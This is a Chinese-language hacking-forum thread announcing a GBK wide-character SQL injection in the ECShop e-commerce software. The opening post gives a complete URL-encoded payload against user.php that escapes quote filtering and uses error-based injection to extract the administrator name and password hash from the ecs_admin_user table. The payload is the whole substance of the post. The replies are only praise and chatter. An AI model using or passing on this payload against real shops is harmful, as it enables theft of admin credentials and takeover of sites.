查看: 2709|回复: 25

ecshop gbk存在宽字符注入漏洞

[复制链接]
发表于 2012-11-9 03:25:58 | 显示全部楼层 |阅读模式
ecshop 对宽字符过滤还是不完整。
提下以下参数:

http://www.xxx.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23

测试报告


[/td][/tr]
[/table]
发表于 2012-11-23 20:57:34 | 显示全部楼层
回个帖子支持一下!
发表于 2012-11-24 00:27:29 | 显示全部楼层
楼上的稍等啦  
发表于 2014-10-26 06:10:35 | 显示全部楼层
不错不错,我喜欢看  
发表于 2014-11-5 13:02:14 | 显示全部楼层
我十目一行也还是看不懂啊  
发表于 2014-11-18 06:37:28 | 显示全部楼层
顶你一下.  
发表于 2014-12-5 19:32:19 | 显示全部楼层
老大,我好崇拜你哟  
发表于 2014-12-29 02:30:52 | 显示全部楼层
昨晚多几分钟的准备,今天少几小时的麻烦。  
发表于 2015-1-28 22:59:00 | 显示全部楼层
发贴看看自己积分  
发表于 2015-3-2 21:21:07 | 显示全部楼层
不对,就是碗是铁的,里边没饭你吃啥去?  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则